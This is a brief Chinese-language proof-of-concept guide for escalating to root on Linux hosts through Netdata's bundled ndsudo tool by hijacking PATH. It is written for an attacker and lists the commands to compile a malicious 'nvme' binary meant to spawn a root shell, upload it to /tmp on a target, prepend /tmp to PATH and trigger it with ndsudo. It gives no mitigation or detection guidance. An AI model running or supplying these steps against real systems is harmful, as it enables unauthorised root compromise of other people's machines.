通过`ndsudo`实现的权限提升(Netdata本地漏洞利用)

此POC用于利用Netdata捆绑的易受攻击的ndsudo工具，将本地权限提升至root。漏洞利用的工作原理是将恶意二进制文件注入用户的PATH中，该文件冒充受信任的命令(nvme)，并由ndsudo以root权限执行。

前提条件与假设

在您的攻击机器上（或如果易受攻击的系统有编译器），编译恶意二进制文件（例如从文件poc.c）：

1

gcc poc.c -o nvme

此二进制文件应设计为生成root shell或以root权限执行任意命令。

将编译好的nvme二进制文件移动或上传到用户可写的目录，例如/tmp：

1
2


scp nvme user@target:/tmp/
# 或使用您拥有的任何文件上传方法

在目标系统上，确保二进制文件可执行，并将其目录添加到您的PATH前面：

1
2


chmod +x /tmp/nvme
export PATH=/tmp:$PATH

这确保ndsudo将解析并执行您的恶意nvme而不是合法的那个。

运行易受攻击的命令以触发ndsudo：

1

./ndsudo nvme-list